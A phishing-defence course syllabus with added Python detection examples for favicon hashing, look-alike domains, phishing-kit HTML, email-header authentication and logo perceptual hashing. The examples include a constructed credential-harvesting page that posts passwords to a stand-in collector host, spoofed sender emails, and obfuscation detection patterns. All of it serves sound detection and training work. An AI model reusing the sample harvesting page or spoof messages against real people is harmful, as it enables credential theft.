Module 1: Introduction to Phishing Threat Landscape

1.1 Historical Perspective
- Evolution from basic email scams to sophisticated multi-channel attacks
- Timeline of significant phishing campaigns and their impact
- How threat actors have adapted to security controls

1.2 Current Phishing Landscape
- Global statistics and impact on organizations
- Industry-specific targeting patterns
- Geographic distribution of phishing infrastructure
- Economic impact of successful phishing campaigns

1.3 Current Trends in Phishing
- AI-Driven Phishing Attacks: ChatGPT, DeepSeek, LLaMA, and more
- Automated Spear Phishing: Hyper-personalized emails
- Business Email Compromise (BEC)
- Phishing-as-a-Service (PhaaS)

1.4 Phishing Attack Taxonomy
- Email-based phishing
- Spear phishing and whaling
- Clone phishing
- Smishing (SMS phishing)
- Vishing (voice phishing)
- QR code phishing
- Search engine phishing
- Social media phishing and impersonation
- Business Email Compromise (BEC)
- Hybrid phishing attacks

Module 2: Anatomy of a Phishing Attack

2.1 Phishing Kill Chain Analysis
- Reconnaissance: Open-source intelligence (OSINT), LinkedIn scraping, selecting the domains and senders to impersonate
- Weaponization: Crafting payloads, malicious links, attachments and spoofed or look-alike sender domains
- Delivery: Email, SMS (smishing), voice (vishing) and social media phishing
- Exploitation: Credential harvesting, malware execution
- Installation and Command and Control (C2): Establishing backdoor communications
- Actions on Objectives: Data theft, financial fraud, lateral movement

2.2 Common Phishing Techniques
- Email Phishing: Tactics, indicators, and examples
- Spear Phishing: Targeted approach and personalization methods
- Clone Phishing: Replicating legitimate communications
- Whaling: Targeting C-Suite Executives
- Smishing (SMS-based): Mobile attack vectors
- Vishing (Voice-based): Social engineering over phone calls
- Social Media Impersonation: Brand and executive spoofing

Module 3: AI-Driven Phishing Tactics

3.1 How Threat Actors Use AI
- Content Generation with LLMs: GPT-4, Claude, Bard
- Natural language processing for creating convincing messages
- Automated Payload Generation: Multi-language phishing emails
- Hyper-Personalization Techniques: Real-time scraping of social media and company news
- Machine learning for target selection and customization
- Phishing Chatbots: Engaging targets interactively to gather more information
- Deepfake Voice Calls: Advanced vishing techniques
- Case studies of AI-enhanced phishing campaigns

3.2 AI Tools Used by Threat Actors
- Overview of accessible AI tools being weaponized
- Large Language Models (LLMs) for content generation
- AI-based translation tools for global targeting
- Voice cloning for executive impersonation
- Image generation for creating fake personas and scenarios

3.3 Detection and Defense against AI-based Phishing
- Pattern analysis of LLM-generated texts
- AI-based anomaly detection
- Real-time content analysis for linguistic markers
- AI detection limitations and blindspots
- Creating awareness around AI-generated content
- Technical controls specific to AI-powered phishing
- Developing organizational resilience against AI threats

Module 4: Phishing Kits and Infrastructure Analysis

4.1 Understanding Phishing Kits
- Components of phishing kits
- Open-source phishing kits and commercial offerings
- Modular design: HTML, PHP scripts, and data capture forms
- Plug-and-play kits vs. custom development
- Admin panels and management interfaces
- Evasion techniques built into kits
- Exfiltration methods and credential handling
- Detection Techniques: Fingerprinting common phishing kit signatures

4.2 Phishing-as-a-Service (PhaaS)
- Overview of PhaaS platforms
- Underground marketplace dynamics
- Pricing models and service offerings
- Dark Web marketplaces for phishing kits
- Subscription models and service tiers
- Customer support and infrastructure management
- Distribution channels and affiliate programs
- Case studies of prominent PhaaS operations

4.3 Hosting and Infrastructure
- Bulletproof hosting providers
- Compromised websites and legitimate infrastructure abuse
- Fast-flux networks and domain generation algorithms
- Temporary/disposable infrastructure strategies
- Abuse of content delivery networks (CDNs)

4.4 Domain Registration Tactics
- Typosquatting and homograph attacks
- Domain aging and reputation building
- Subdomain abuse of legitimate domains
- TLD selection strategies
- Just-in-time domain registration patterns

4.5 Command and Control (C2) Analysis
- Understanding C2 mechanisms for phishing attacks
- Common TTPs: Domain Fronting, Bulletproof Hosting
- Advanced threat hunting techniques

Module 5: Advanced Technical Detection Methods

5.1 Favicon Hash Analysis for Phishing Detection
- How phishing sites use real favicons to mimic legitimate brands
- Fundamentals of favicon fingerprinting
- Creating a favicon hash database of legitimate sites
- Using favicon hashes to fingerprint phishing sites
- Implementing automated favicon comparison tools
- Automated scanning methods
- Favicon analysis limitations and evasion techniques
- Integration with existing security stacks
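Worked example for 5.1, added for this edit and not part of the original course material: it computes the favicon fingerprint the way Shodan and the mmh3 library do (MurmurHash3 x86_32 over the MIME base64 text of the icon file, reported as a signed 32-bit integer), builds a small database of legitimate brand icons, and flags a host that serves a watchlisted brand's icon. The icon bytes, hostnames and watchlist are constructed for the example; the hash function itself is the standard MurmurHash3.

```python
import base64

def murmur3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3 x86_32 (the function behind mmh3.hash and Shodan's favicon hash), unsigned."""
    c1, c2, mask = 0xcc9e2d51, 0x1b873593, 0xffffffff
    h = seed & mask
    nblocks = len(data) // 4
    for i in range(nblocks):
        k = int.from_bytes(data[4 * i:4 * i + 4], "little")
        k = (k * c1) & mask
        k = ((k << 15) | (k >> 17)) & mask
        k = (k * c2) & mask
        h ^= k
        h = ((h << 13) | (h >> 19)) & mask
        h = (h * 5 + 0xe6546b64) & mask
    tail = data[4 * nblocks:]          # 0..3 trailing bytes
    k = 0
    if len(tail) >= 3:
        k ^= tail[2] << 16
    if len(tail) >= 2:
        k ^= tail[1] << 8
    if len(tail) >= 1:
        k ^= tail[0]
        k = (k * c1) & mask
        k = ((k << 15) | (k >> 17)) & mask
        k = (k * c2) & mask
        h ^= k
    h ^= len(data)
    h ^= h >> 16                        # finalisation mix
    h = (h * 0x85ebca6b) & mask
    h ^= h >> 13
    h = (h * 0xc2b2ae35) & mask
    h ^= h >> 16
    return h

def to_signed32(n: int) -> int:
    return n - (1 << 32) if n & 0x80000000 else n

def favicon_hash(icon: bytes) -> int:
    """Shodan-style favicon hash: murmur3 over the MIME base64 text of the file (76-character
    lines plus a trailing newline), as a signed 32-bit int. Hashing the raw bytes instead
    gives a different number that will not match published hashes."""
    return to_signed32(murmur3_32(base64.encodebytes(icon)))

# Constructed stand-ins for real favicons (real ones are ICO/PNG files; the hash does not care).
BANK_ICON = b"\x00\x00\x01\x00" + b"EXAMPLE-BANK-ICON" * 20
MAIL_ICON = b"\x89PNG\r\n\x1a\n" + b"EXAMPLE-MAIL-ICON" * 20
LEGIT_FAVICONS = {favicon_hash(BANK_ICON): "examplebank.test",
                  favicon_hash(MAIL_ICON): "examplemail.test"}   # hash -> brand domain

def check_site(hostname: str, served_icon: bytes) -> dict:
    """Flag a host that serves a watchlisted brand's favicon but is not that brand's domain."""
    h = favicon_hash(served_icon)
    brand = LEGIT_FAVICONS.get(h)
    if brand is None:
        return {"hash": h, "verdict": "unknown icon"}
    if hostname == brand or hostname.endswith("." + brand):
        return {"hash": h, "brand": brand, "verdict": "ok"}
    return {"hash": h, "brand": brand, "verdict": "brand favicon served by foreign host"}
```

The signed value is what the Shodan filter http.favicon.hash: expects, so the same number found here can be used to enumerate other hosts serving the icon. Two caveats that belong with the section's last bullet: a kit that hotlinks the brand's icon from the brand's own origin never serves the file itself, so the crawler has to record where the icon was actually fetched from; and a single altered byte changes this hash completely, which is why exact hashing is paired with perceptual comparison in 5.6.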
5.2 Certificate Transparency Logs
- Leveraging CT logs to spot newly issued certificates for look-alike or brand-bearing domain names
- Spotting suspicious TLS certificates: brand keywords in subject names, certificates issued shortly before a campaign
- Domain reputation services and integration
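Worked example serving both 4.4 (typosquatting, homograph attacks, subdomain abuse) and 5.2, since the checks a CT-log watcher runs on every newly logged certificate name are exactly the domain-registration checks of 4.4. This is illustrative code added for this edit, not course material: the brand watchlist, the ".test" domains and the small table of confusable characters are constructed (the table is a sample, not the full Unicode confusables list), and treating the last two labels as the registrable domain is a stated simplification of what a Public Suffix List lookup would do.

```python
import unicodedata

# Constructed watchlist; a real deployment loads the organisation's own brand domains.
WATCHLIST = ["paypal.com", "microsoft.com", "examplebank.test"]

# ASCII sequences that render like another letter in many fonts.
ASCII_CONFUSABLES = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]

# Sample of the Unicode confusables table (Cyrillic/Greek letters that look Latin); not the full table.
UNICODE_LOOKALIKES = {"\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
                      "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0455": "s", "\u0458": "j",
                      "\u03bf": "o", "\u03bd": "v"}

def decode_idn(domain: str) -> str:
    """Turn xn-- (punycode) labels back into Unicode so homographs become visible."""
    try:
        return domain.encode("ascii").decode("idna")
    except UnicodeError:
        return domain

def scripts_in(label: str) -> set:
    """Unicode scripts used by the letters of a label, e.g. {'LATIN', 'CYRILLIC'}."""
    return {unicodedata.name(c, "UNKNOWN").split()[0] for c in label if c.isalpha()}

def skeleton(label: str) -> str:
    """Fold visually confusable characters to their Latin target so lookalikes compare equal."""
    folded = "".join(UNICODE_LOOKALIKES.get(c, c) for c in label)
    for seq, rep in ASCII_CONFUSABLES:
        folded = folded.replace(seq, rep)
    return folded

def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def score_domain(candidate: str) -> dict:
    """Report homograph, typosquat, combosquat and subdomain-abuse indicators against WATCHLIST."""
    uni = decode_idn(candidate.lower().rstrip("."))
    labels = uni.split(".")
    reg = ".".join(labels[-2:])                     # assumption: registrable domain = last two labels
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    findings = []
    if reg in WATCHLIST:                             # the brand's own domain (and its subdomains)
        return {"domain": uni, "findings": findings}
    if len(scripts_in(sld)) > 1:
        findings.append(f"mixed scripts in '{sld}': {sorted(scripts_in(sld))}")
    for brand in WATCHLIST:
        bsld = brand.split(".")[0]
        sk, bk = skeleton(sld), skeleton(bsld)
        if sk == bk:
            findings.append(f"lookalike of {brand}: '{sld}' folds to '{bsld}'")
        elif len(bsld) >= 5 and levenshtein(sk, bk) <= 2:
            findings.append(f"typosquat of {brand}: '{sld}' is within edit distance {levenshtein(sk, bk)}")
        elif bsld in sld:
            findings.append(f"combosquat of {brand}: '{sld}' embeds the brand name")
        if bsld in labels[:-2]:
            findings.append(f"brand label '{bsld}' used as a subdomain of unrelated domain {reg}")
    return {"domain": uni, "findings": findings}

# Constructed sample: paypal.com with a Cyrillic a, punycode-encoded the way CT logs and WHOIS show it.
HOMOGRAPH_SAMPLE = "p\u0430ypal.com".encode("idna").decode("ascii")
```

Feed every DNS name from a CT log entry (subject and SAN values) through score_domain and alert on non-empty findings; the mixed-script and fold-to-brand checks catch the IDN case that a plain string comparison on the xn-- form never sees. The edit-distance threshold and the short-brand guard are tuning knobs: lower them and "oracle"-length brands start matching ordinary words.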
5.3 DNS Sinkholing and Passive DNS Analysis
- Tracking phishing domains through passive DNS
- Identifying malicious infrastructure
- Advanced URL parsing and anomaly detection
- WHOIS data analysis and registration patterns
- Historical DNS analysis for phishing detection

5.4 HTML and JavaScript Analysis
- Source code patterns indicative of phishing
- Obfuscation techniques and their detection
- Form data collection and exfiltration methods
- JavaScript-based evasion and anti-analysis techniques
- Automated tools for HTML/JS phishing detection
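Worked example serving both 4.1 (kit fingerprinting: HTML, PHP capture scripts, exfiltration) and 5.4: a small static analyzer that pulls the parts a credential-harvesting page is assembled from and scores the indicators the two sections list (a password form posting to a foreign host or capture script, hidden iframes, eval/atob over a large encoded literal, right-click disabled). This is illustrative code added for this edit, not course material; the two HTML pages and the hostnames are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SUSPICIOUS_JS = ("eval(", "unescape(", "atob(", "fromCharCode", "document.write(", "debugger")
LONG_LITERAL = re.compile(r"""["'][A-Za-z0-9+/=%\\]{200,}["']""")   # one big encoded blob in a string

class PageCollector(HTMLParser):
    """Collects forms, input types, iframes, inline scripts and the oncontextmenu handler."""
    def __init__(self):
        super().__init__()
        self.forms, self.input_types, self.iframes, self.scripts = [], [], [], []
        self.context_menu_blocked = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append((a.get("action", ""), a.get("method", "get").lower()))
        elif tag == "input":
            self.input_types.append(a.get("type", "text").lower())
        elif tag == "iframe":
            self.iframes.append(a)
        elif tag == "script":
            self._in_script = True
        if "oncontextmenu" in a:            # right-click disabled: anti-analysis habit of many kits
            self.context_menu_blocked = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def is_hidden(iframe: dict) -> bool:
    style = iframe.get("style", "").replace(" ", "").lower()
    return ("display:none" in style or "visibility:hidden" in style
            or iframe.get("width") == "0" or iframe.get("height") == "0")

def analyze_page(page_url: str, html: str) -> dict:
    host = (urlparse(page_url).hostname or "").lower()
    p = PageCollector()
    p.feed(html)
    p.close()
    findings = []
    has_password = "password" in p.input_types
    for action, method in p.forms:
        target = urlparse(action)
        if target.hostname and target.hostname.lower() != host:
            findings.append(f"form posts to off-site host {target.hostname}"
                            + (" (password field present)" if has_password else ""))
        if has_password and method == "get":
            findings.append("password form submitted with GET (credentials end up in URLs and logs)")
    for frame in p.iframes:
        if is_hidden(frame):
            findings.append(f"hidden iframe loading {frame.get('src', '?')}")
    for script in p.scripts:
        hits = [k for k in SUSPICIOUS_JS if k in script]
        if hits and LONG_LITERAL.search(script):
            findings.append(f"obfuscated script: {', '.join(hits)} over a long encoded literal")
    if p.context_menu_blocked:
        findings.append("context menu disabled (anti-analysis)")
    if has_password and len(findings) >= 2:
        verdict = "likely credential-harvesting page"
    elif findings:
        verdict = "suspicious, review"
    else:
        verdict = "no kit indicators"
    return {"host": host, "password_form": has_password, "findings": findings, "verdict": verdict}

# Constructed samples: a kit-style page and a benign login page.
PHISH_HTML = (
    '<html><head><title>Sign in - Example Bank</title></head>'
    '<body oncontextmenu="return false">'
    '<form method="post" action="https://collector.test/post.php">'
    '<input type="text" name="user"><input type="password" name="pass"><input type="submit"></form>'
    '<iframe src="https://examplebank.test/" width="0" height="0" style="display:none"></iframe>'
    '<script>var p="' + "QWxlcnQoMSk7" * 30 + '";eval(atob(p));</script></body></html>'
)
BENIGN_HTML = (
    '<html><head><title>Sign in</title></head><body>'
    '<form method="post" action="/login"><input type="text" name="user">'
    '<input type="password" name="pass"></form>'
    '<script>document.getElementById("user").focus();</script></body></html>'
)
```

The off-site form action is the single strongest signal, because a kit's capture script (post.php, next.php or similar) and its exfiltration target are the parts the operator cannot remove; the remaining checks are cheap corroboration. Pages that build the form with JavaScript after load, or that gate content behind a bot check, show nothing to a static parser, which is the limitation the section's "anti-analysis techniques" bullet refers to: those need a headless browser and the rendered DOM.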
5.5 Email Header and Content Analysis
- SPF, DKIM and DMARC investigation: DNS records, authentication results and alignment with the From domain
- Email header anomaly detection
- Content fingerprinting techniques
- Natural language processing for content analysis
- Sender behavior analysis and pattern recognition
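Worked example for 5.5, added for this edit and not part of the original course material: it parses the headers of a received message with the standard library, reads the Authentication-Results header the receiving MX stamped on it, recomputes DMARC-style relaxed alignment (SPF or DKIM must pass on a domain that shares the organisational domain of the RFC5322.From address), and adds the header-anomaly checks the section lists (Return-Path and Reply-To mismatches, display-name impersonation). The three raw messages, the hostnames and the brand watchlist are constructed; taking the last two labels as the organisational domain is a stated simplification of a Public Suffix List lookup.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed watchlist: protected brand domain -> words impersonators put in the display name.
BRAND_KEYWORDS = {"examplebank.test": ("example bank", "examplebank")}

def org_domain(domain: str) -> str:
    """Assumption: organisational domain = last two labels (a real check uses the Public Suffix List)."""
    return ".".join(domain.lower().strip("<>").split(".")[-2:]) if domain else ""

def parse_auth_results(value: str) -> dict:
    """Method results plus the domains they were evaluated on, from Authentication-Results."""
    out = {m.lower(): r.lower() for m, r in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", value, re.I)}
    spf = re.search(r"smtp\.mailfrom=([^\s;]+)", value, re.I)
    dkim = re.search(r"header\.d=([^\s;]+)", value, re.I)
    out["spf_domain"] = org_domain(spf.group(1).split("@")[-1]) if spf else ""
    out["dkim_domain"] = org_domain(dkim.group(1)) if dkim else ""
    return out

def analyze_headers(raw: str) -> dict:
    msg = message_from_string(raw)
    from_name, from_addr = parseaddr(msg.get("From", ""))
    from_dom = org_domain(from_addr.split("@")[-1])
    reply_dom = org_domain(parseaddr(msg.get("Reply-To", ""))[1].split("@")[-1])
    return_dom = org_domain(parseaddr(msg.get("Return-Path", ""))[1].split("@")[-1])
    auth = parse_auth_results(msg.get("Authentication-Results", ""))
    findings = []
    # DMARC relaxed alignment: SPF or DKIM must pass on a domain aligned with RFC5322.From.
    spf_aligned = auth.get("spf") == "pass" and auth.get("spf_domain") == from_dom
    dkim_aligned = auth.get("dkim") == "pass" and auth.get("dkim_domain") == from_dom
    if not (spf_aligned or dkim_aligned):
        findings.append(f"no aligned authentication for From domain {from_dom} "
                        f"(spf={auth.get('spf')} on {auth.get('spf_domain') or '-'}, "
                        f"dkim={auth.get('dkim')} d={auth.get('dkim_domain') or '-'})")
    if return_dom and return_dom != from_dom:
        findings.append(f"Return-Path domain {return_dom} differs from From domain {from_dom}")
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To sends replies to {reply_dom}, not {from_dom}")
    for brand, words in BRAND_KEYWORDS.items():
        if any(w in from_name.lower() for w in words) and from_dom != brand:
            findings.append(f"display name '{from_name}' impersonates {brand} but sender domain is {from_dom}")
    return {"from": from_addr, "from_domain": from_dom, "auth": auth, "findings": findings}

# Constructed samples. 1) exact-domain spoof: From claims the brand, but nothing authenticates for it.
SPOOF_RAW = """Return-Path: <bounce-8812@mailer-xyz.test>
Authentication-Results: mx.corp.test; spf=pass smtp.mailfrom=mailer-xyz.test; dkim=pass header.d=mailer-xyz.test; dmarc=fail (p=reject) header.from=examplebank.test
From: "Example Bank Security" <alerts@examplebank.test>
Reply-To: <support@examplebank-helpdesk.test>
To: <victim@corp.test>
Subject: Unusual sign-in detected

Please verify your account.
"""
# 2) look-alike domain the attacker controls: SPF, DKIM and DMARC all pass, only the name lies.
LOOKALIKE_RAW = """Return-Path: <bounce@examplebank-secure.test>
Authentication-Results: mx.corp.test; spf=pass smtp.mailfrom=examplebank-secure.test; dkim=pass header.d=examplebank-secure.test; dmarc=pass header.from=examplebank-secure.test
From: "Example Bank Security" <alerts@examplebank-secure.test>
To: <victim@corp.test>
Subject: Unusual sign-in detected

Please verify your account.
"""
# 3) legitimate mail: bounces go to a subdomain, which relaxed alignment accepts.
LEGIT_RAW = """Return-Path: <bounces@mail.examplebank.test>
Authentication-Results: mx.corp.test; spf=pass smtp.mailfrom=mail.examplebank.test; dkim=pass header.d=examplebank.test; dmarc=pass header.from=examplebank.test
From: "Example Bank Alerts" <alerts@examplebank.test>
To: <victim@corp.test>
Subject: Your monthly statement

Your statement is ready.
"""
```

The second sample is the point of the caveat: a look-alike domain registered by the attacker passes every authentication check, so SPF/DKIM/DMARC results prove only who sent the mail, not that the sender is who the display name says. Trust the Authentication-Results header only when the authserv-id (mx.corp.test above) is your own gateway; an attacker can inject one of their own, and most gateways strip foreign copies on ingress for exactly that reason.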
5.6 Image-based Phishing Detection
- Logo detection and comparison through computer vision
- Visual similarity algorithms
- OCR (Optical Character Recognition) for image-based attacks
- Screenshot comparison with legitimate sites
- Perceptual hashing techniques
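Worked example for 5.6, added for this edit and not part of the original course material: a difference hash (dHash), the simplest of the perceptual hashing techniques the section lists, implemented on already-decoded grayscale pixels so it runs without an image library (a real pipeline would decode the PNG/ICO with Pillow first, which is not used here). The "logo" is a constructed light square on a dark background; the example shows why a perceptual hash, unlike the exact favicon hash of 5.1, survives brightness changes and rescaling and still separates a different shape.

```python
def resize_average(img, width, height):
    """Box-average a grayscale matrix (rows of 0..255 ints) down to width x height."""
    src_h, src_w = len(img), len(img[0])
    out = []
    for y in range(height):
        y0 = y * src_h // height
        y1 = max((y + 1) * src_h // height, y0 + 1)
        row = []
        for x in range(width):
            x0 = x * src_w // width
            x1 = max((x + 1) * src_w // width, x0 + 1)
            block = [img[yy][xx] for yy in range(y0, y1) for xx in range(x0, x1)]
            row.append(sum(block) / len(block))
        out.append(row)
    return out

def dhash(img, hash_size=8) -> int:
    """Difference hash: shrink to (hash_size+1) x hash_size, emit a 1 bit wherever a pixel is
    darker than its right-hand neighbour. Only the gradient direction survives, not the levels."""
    small = resize_average(img, hash_size + 1, hash_size)
    bits = 0
    for row in small:
        for x in range(hash_size):
            bits = (bits << 1) | (1 if row[x] < row[x + 1] else 0)
    return bits

def hamming(a: int, b: int) -> int:
    return bin(a ^ b).count("1")

def make_logo(size=32, box=(8, 24), bg=40, fg=220):
    """Constructed stand-in for a brand logo: a light square on a dark background."""
    lo, hi = box
    return [[fg if lo <= x < hi and lo <= y < hi else bg for x in range(size)] for y in range(size)]

def brighten(img, delta):
    """Uniform brightness shift with clamping, as a re-encoded screenshot might apply."""
    return [[min(255, v + delta) for v in row] for row in img]

def upscale2(img):
    """Nearest-neighbour 2x enlargement."""
    return [[img[y // 2][x // 2] for x in range(2 * len(img[0]))] for y in range(2 * len(img))]

LOGO = make_logo()                    # reference logo
OTHER_LOGO = make_logo(box=(2, 14))   # same colours, different composition

def compare(candidate, reference=LOGO, threshold=10) -> dict:
    """Hamming distance between dHashes; small distances mean 'visually the same logo'."""
    d = hamming(dhash(candidate), dhash(reference))
    return {"distance": d, "match": d <= threshold}
```

The threshold is the tuning point: with 64 bits, distances under about 10 are usually the same image after recompression or resizing, while unrelated images sit near 32. The weakness to remember is flat regions: where neighbouring cells are exactly equal the bit is a tie, and a little noise flips it, so dHash is best used on a logo crop rather than a whole screenshot, and a pHash (DCT-based) or a learned embedding handles noisy captures better.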

Module 6: Phishing Simulation and Awareness Programs

6.1 Designing Effective Phishing Simulations
- Developing realistic scenarios that mimic current phishing TTPs
- Creating simulations that match the organization’s threat model
- Tools and platforms for phishing simulations
- Customizing campaigns for different departments and risk levels
- Metrics and measurement methodologies

6.2 Tracking Employee Response and Improvement
- Establishing baselines for user susceptibility
- Measuring reporting rates vs. click rates
- Tracking improvement over time
- Analyzing departmental and role-based vulnerabilities
- Developing KPIs for awareness effectiveness

6.3 Building a Culture of Awareness and Vigilance
- Executive buy-in and leadership involvement
- Reward systems for reporting suspicious messages
- Creating a positive security culture
- Just-in-time training for users who fall for simulations
- Regular security communications and updates

6.4 Advanced Awareness Strategies
- Micro-learning and continuous education
- Gamification of security awareness
- Personalized awareness based on user behavior
- Role-specific training for high-value targets
- Measuring behavior change beyond simulation metrics

Module 7: Response and Remediation Strategies

7.1 Building an Effective Phishing IR Plan
- Phishing-specific playbooks development
- Roles and responsibilities in phishing response
- Communication protocols during active campaigns
- Containment strategies for different phishing vectors
- Recovery and post-incident procedures

7.2 Real-time Incident Response
- Initial triage and analysis methodologies
- Prioritization frameworks for phishing reports
- Rapid analysis of phishing payloads
- Determining attack scope and potential impact
- Initial containment actions: quarantine and isolation of compromised accounts
- Domain takedowns and reporting to hosting providers, registrars and ISPs
- Parallel investigation techniques

7.3 Evidence Collection and Forensics
- Preserving email evidence
- Web server logs and network traffic analysis
- Endpoint forensics for compromised systems
- Documenting the phishing infrastructure
- Chain of custody considerations
- Digital forensics for email headers, URLs, and phishing forms

7.4 Threat Intelligence Integration
- Leveraging threat intelligence in investigations
- Identifying campaign relationships and attribution
- Sharing indicators of compromise (IoCs) and consuming real-time IoC feeds
- Participating in industry sharing groups
- Creating actionable intelligence from incidents
- Integrating CTI into SIEM and EDR for proactive defense

7.5 Post-Incident Activities
- Root cause analysis for successful phishing attacks
- Measuring effectiveness of response
- Feedback loops to prevention measures
- Metrics and reporting for executive leadership
- Continuous improvement of phishing defenses
- Conducting lessons-learned sessions
- Updating threat models and playbooks

Module 8: Compliance and Regulatory Considerations

8.1 GDPR and Data Breach Notifications
- Understanding notification requirements when phishing leads to a personal data breach
- Timeline requirements for reporting (notification to the supervisory authority within 72 hours of becoming aware, Article 33)
- Documentation requirements for compliance
- Cross-border considerations for international organizations

8.2 CCPA Compliance for Phishing-Related Data Theft
- California-specific requirements
- Consumer notification processes
- Documentation and reporting requirements
- Potential penalties and enforcement actions

8.3 ISO 27001 and SOC 2 Considerations
- How phishing controls map to common frameworks
- Documentation requirements for certification
- Gap analysis methodologies
- Continuous compliance monitoring

8.4 Financial Sector Requirements
- PCI-DSS requirements related to phishing prevention
- FINRA and SEC guidelines for financial institutions
- Banking-specific reporting requirements
- Industry-specific frameworks and best practices

8.5 Healthcare Sector Requirements
- HIPAA considerations for phishing-related breaches
- Protected health information (PHI) considerations
- Sector-specific reporting requirements
- Patient notification requirements

Module 9: SOC Team Management for Phishing Defense

9.1 Building and Training Specialized Phishing Analysis Teams
- Skill requirements and development paths
- Technical vs. behavioral analysis capabilities
- Training programs and certification paths
- Performance metrics for phishing analysts
- Building institutional knowledge repositories

9.2 Tool Selection and Integration
- Email security gateway optimization
- Phishing simulation platforms
- SOAR integration for phishing response
- User reporting mechanisms
- Automated analysis and triage systems

9.3 Workflow Optimization
- Managing phishing report volume
- Automating repetitive analysis tasks
- Alert fatigue reduction strategies
- Integrating phishing response with broader SOC operations
- Service level agreements for phishing response

9.4 Metrics and Reporting
- Key performance indicators for phishing defense
- Executive-level reporting frameworks
- Measuring SOC effectiveness against phishing
- Trend analysis and predictive metrics
- Regulatory and compliance reporting requirements

Module 10: Hands-On Labs and Practical Exercises

10.1 Advanced Phishing Analysis Lab
- Real-world phishing email analysis
- Hands-on analysis of sophisticated phishing samples
- Phishing kit dissection and analysis
- Infrastructure tracking and takedown procedures
- Developing custom detection rules
- Threat hunting exercises for phishing campaigns
- Detection of AI-generated phishing attempts
- Writing YARA rules to detect phishing kits and payloads